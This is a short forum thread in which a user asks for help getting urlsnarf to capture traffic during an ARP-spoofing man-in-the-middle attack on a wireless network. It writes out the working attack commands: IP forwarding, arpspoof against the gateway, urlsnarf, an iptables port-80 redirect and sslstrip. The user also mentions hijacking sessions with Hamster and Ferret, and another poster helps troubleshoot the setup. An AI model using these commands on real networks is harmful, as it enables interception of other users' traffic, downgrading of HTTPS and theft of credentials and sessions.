Zoomzoom Posted March 9, 2012 Share Posted March 9, 2012 Use: echo 0 > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 192.168.0.1 urlsnarf -i wlan0 =========================== In the R2 is not working! ((( Urlsnarf sees nothing - except for local traffic. In the 5,R1,R2 does not work ((( Same thing with the Driftnet - sees only the local traffic. If we continue: iptables-t nat-A PREROUTING-p tcp - destination-port 80-j REDIRECT - to-ports 10000 sslstrip.py-a-k-f-w temp / $ sslstripfile It just works Urlsnarf (!) What am I doing wrong? How to make Urlsnara work separately (without sslstrip.py)? P.S Excuse my language Quote Link to comment Share on other sites More sharing options...
Andrei0427 Posted March 9, 2012 Share Posted March 9, 2012 You need to echo 1 into the ip_forward. Also, try type arp -a into a cmd in windows and check if the MAC of the default gateway matches your 'attack' pc. Quote Link to comment Share on other sites More sharing options...
Zoomzoom Posted March 9, 2012 Author Share Posted March 9, 2012 Sorry. I made a mistake when writing the post. I use an echo 1. Mitm works 100%! Hamster + feret + shark work fine. Not only works Urlsnarf (only works if enabled ssltrip). Please check at himself. Quote Link to comment Share on other sites More sharing options...
Zoomzoom Posted March 10, 2012 Author Share Posted March 10, 2012 Guys help me! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.